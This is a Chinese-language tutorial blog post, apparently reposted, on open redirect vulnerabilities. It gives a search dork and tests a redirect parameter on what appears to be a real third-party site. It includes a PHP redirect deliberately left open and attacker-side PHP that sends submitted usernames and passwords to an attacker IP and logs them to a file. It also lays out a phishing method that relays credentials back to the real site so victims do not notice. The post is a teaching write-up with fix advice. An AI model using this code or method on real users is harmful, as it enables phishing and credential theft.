URL重定向漏洞

这篇具有很好参考价值的文章主要介绍了URL重定向漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1. URL重定向

  URL跳转漏洞,也叫开放重定向漏洞(open redirect) 。CWE-601对该漏洞的描述为:http 参数可能包含一个 URL 值,并可能导致 Web 应用程序将请求重定向到指定的 URL。通过修改恶意站点的 URL 值,攻击者可能成功发起网络钓鱼诈骗并窃取用户凭据。简单说来就是参数可控导致的漏洞产生。

1.1. 漏洞位置

  下面就是漏洞可能存在的一些位置。

  • 用户登录、统一身份认证、认证完进行跳转。
  • 用户分享、收藏内容跳转。
  • 跨站点认证、授权后。
  • 站内其它链接跳转。
  • 注册、注销、修改密码等。
  • 账户切换、保存设置。

2. URL重定向基础演示

  这里就是简单的查找演示,不会将对真实的网站进行测试。

2.1. 查找漏洞

inurl:url=http://

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.1.1. 测试漏洞

  这里可以看到URL就是一个典型的后面带地址跳转的。

https://www.lsbin.com/wp-content/themes/begin%20lts/inc/go.php?url=http://picasion.com/

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.1.2. 加载完情况

  可以看到是跳转到另外一个网站了,那么就证明这个是可以利用的。

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.1.3. 验证漏洞

  这里我们将后面的地址修改为百度的地址,看看是否能够正常跳转。

https://www.lsbin.com/wp-content/themes/begin%20lts/inc/go.php?url=https://baidu.com/

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.1.4. 成功验证

  这里可以看到成功跳转了。

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.2. 代码修改

  代码修改,这里由于特殊情况,所以需要修改一下代码。

2.2.1. 用户端代码修改

  这里就是为了让用户端能够接收跳转,原本的靶场是不支持跳转的。

客户端搭建成功后,修改zb_system/login.php文件

加入代码:
if(isset($_GET['url'])){
	header("Location: " . $_GET['url']);
}

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.2.2. 攻击端代码修改

  这里就是为了能够实现一些密码读取的功能,需要对其代码进行修改,这里会代码的大佬就不用看了。

修改zb_system/cmd.php接收文件,这里的IP地址要写攻击端的,当然有域名肯定就写域名,这里是我测试。
加入代码:
$username=$_POST['username'];
$password=$_POST['password'];
echo "<script src=http://192.168.10.40/zblog/zb_system/x.php?username=$username&password=$password></script>";    

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

  同样这里需要创建一个X.php来接收数据。

创建zb_system/x.php接受文件
<?php

$user=$_REQUEST['username'];
$pass=$_REQUEST['password'];
//echo $user.$pass;
$file=fopen('users.txt','a+');
fwrite($file,$user.'|'.$pass);
fclose($file);

?>

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.3. 利用思路

  这里我们可以这么想,既然存在跳转的情况,那么如果将URL后面的地址修改成功我们自己搭建的钓鱼界面的话,那么是不是就可以成功进行钓鱼了,比如在一些需要输入账号密码的输入框页面中,那么当跳转后,用户依旧以为是正常的跳转,实际上已经跳转到攻击者构建的网站上了。

2.3.1. 用户端

  这里打开页面发现是一个登录的页面,那么登录页面就满足了我们钓鱼的想法,那么就是制作一个一模一样的登录页面,然后通过修改参数将账户密码读取出来。

http://192.168.10.30/zblog/zb_system/login.php

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.3.1.1. 验证跳转

  这里验证一下跳转,这里也是成功跳转了。

http://192.168.10.30/zblog/zb_system/login.php?url=http://baidu.com

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.3.2. 攻击端

  这里再上面修改好了之后,利用URL重定向进行钓鱼,把你涉及的URL发送给别人,让对方去点击,那么点击后就会跳转,若输入账号密码,那么就会得到相关的账号密码或个人信息。

2.3.2.1. 跳转钓鱼

  可以看到这里是成功跳转了,如果你再创建一个域名比较像的,那么是不是就实现了迷惑?

http://192.168.10.30/zblog/zb_system/login.php?url=http://192.168.10.40/zblog/zb_system/login.php

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.3.2.2. 获取账号密码

  这里就等对方输入账户密码了,这里当用户端输入账号密码后,那么再攻击端就能够看到账号密码了,当然这里是会出现登录错误的情况。

  其实这里还有一个办法,如果没有验证码的情况下,可以再你的网站上做个中转,比如将用户输入的账号密码记录下来的同时,自动发送到原先的网站,然后再去校验跳转回原来的网站,这样就神不知鬼不觉了。

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

2.3.2.3. 查看账号密码

  这里我们毕竟使用的是比如的靶场,所以密码都是加密的,如果是代码水平高,自制一个也是可以的。

URL重定向漏洞,网络安全学习,# WEB安全总结笔记,URL重定向,服务器,网络安全,web安全

3. 修复

  绕过方式网上也很多,这里就不介绍了,只要给几个修复建议吧!

  • 1.使用白名单
  • 2.在可能的情况下,让用户提供在服务器端映射到完整目标 URL 的短名称、ID 或令牌
  • 3.不允许将 URL 作为目标的用户输入
  • 4.如果无法避免用户输入,请确保提供的值有效、适用于应用程序,并且已为用户授权
  • 5.从应用程序中删除重定向功能,并将指向它的链接替换为指向相关目标 URL 的直接链接

4. 总结

  以上就是关于url跳转漏洞的一些相关内容。这个漏洞是属于比较好理解的,适合刚入门的新手学习。这个漏洞本身是低危的,当在渗透测试时如果发现存在这个漏洞的时候,不妨看看有没有机会和其他漏洞配合扩大攻击。文章来源地址https://www.toymoban.com/news/detail-682957.html

到了这里,关于URL重定向漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 机器学习和深度学习检测网络安全课题资料:XSS、DNS和DGA、恶意URL、webshell

    XSS 机器学习识别XSS实践 使用深度学习检测XSS 使用深度学习检测XSS(续) DNSDGA检测 使用CNN检测DNS隧道 探秘-基于机器学习的DNS隐蔽隧道检测方法与实现 DNS Tunnel隧道隐蔽

    2024年02月02日
    浏览(31)
  • 网络安全进阶学习第七课——文件包含漏洞

    开发人员通常会把可重复使用的函数写到单个文件中,在 使用某些函数 时, 直接调用此文件 ,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使代码更加灵活,通常会将被包含的文件设置为 变量 ,用来进行动态调用,但正是由于这种灵活性,从而导致客户端

    2024年02月15日
    浏览(39)
  • 网络安全进阶学习第五课——文件上传漏洞

    大部分的网站和应用系统都有上传功能,如用户头像上传,图片上传,文档上传等。 由于对上传文件 未作过滤 或 过滤机制不严(文件后缀或类型) ,导致恶意用户可以上传 脚本文件 ,通过上传文件可以达到控制网站权限的目的。 攻击者可获得网站控制权限; 查看、修改

    2024年02月06日
    浏览(28)
  • 网络安全进阶学习第六课——服务器解析漏洞

    解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web服务器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞 影响范围:2.4.0~2.4.29版本 此漏洞形成的根本原因,在于 , 正则表达式中 , 正则表达式中 , 正则表达式中 不仅匹配字符串结尾位置,也可以匹配n 或 r ,在解

    2024年02月12日
    浏览(37)
  • 新手如何学习挖漏洞?看这篇就够了【网络安全】

    有不少阅读过我文章的伙伴都知道,我从事网络安全行业已经好几年,积累了丰富的经验和技能。在这段时间里,我参与了多个实际项目的规划和实施,成功防范了各种网络攻击和漏洞利用,提高了安全防护水平。 也有很多小伙伴私信问我怎么学?怎么挖漏洞?怎么渗透?

    2024年02月16日
    浏览(38)
  • [网络安全]一文带你了解SSTI漏洞(结合Web_python_template_injection解题详析)

    SSTI是Server-Side Template Injection的缩写,是一种Web应用程序安全漏洞,主要存在于使用基于模板引擎的Web应用程序中。 SSTI漏洞的主要原因是 在Web应用程序中使用了基于模板引擎的渲染功能,并且没有正确地验证和过滤用户输入的数据。当攻击者能够构造特定的输入并成功地注入

    2024年02月08日
    浏览(37)
  • Web 学习笔记 - 网络安全

    目录 m前言 正文 XSS 攻击 简单示例 XSS 防御 CSRF  Web 安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。 网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到 SQL 注入,再到复杂的网络劫持等,

    2023年04月24日
    浏览(36)
  • 【网络安全---XSS漏洞(1)】XSS漏洞原理,产生原因,以及XSS漏洞的分类。附带案例和payload让你快速学习XSS漏洞

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 以pikachu靶场为例子进行讲解,pikachu靶场的搭建请参考以下博客; 【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程(提供靶场代码及工具)_网络安

    2024年02月08日
    浏览(34)
  • 零基础如何学习Web 安全,如何让普通人快速入门网络安全?、

    网络安全现在是朝阳行业,缺口是很大。不过网络安全行业就是需要技术很多的人达不到企业要求才导致人才缺口大 初级的现在有很多的运维人员转网络安全,初级也会慢慢的卷起来,但是岗位多不用怕,以后各大厂也都会要网络安全人员,后续法律也会改革,网络安全只会

    2024年04月22日
    浏览(47)
  • 零基础如何学习 Web 安全,如何让普通人快速入门网络安全?

    前言 网络安全现在是朝阳行业,缺口是很大。不过网络安全行业就是需要技术很多的人达不到企业要求才导致人才缺口大 【一一帮助安全学习(网络安全面试题+学习路线+视频教程+工具)一一】 初级的现在有很多的运维人员转网络安全,初级也会慢慢的卷起来,但是岗位多

    2024年02月12日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包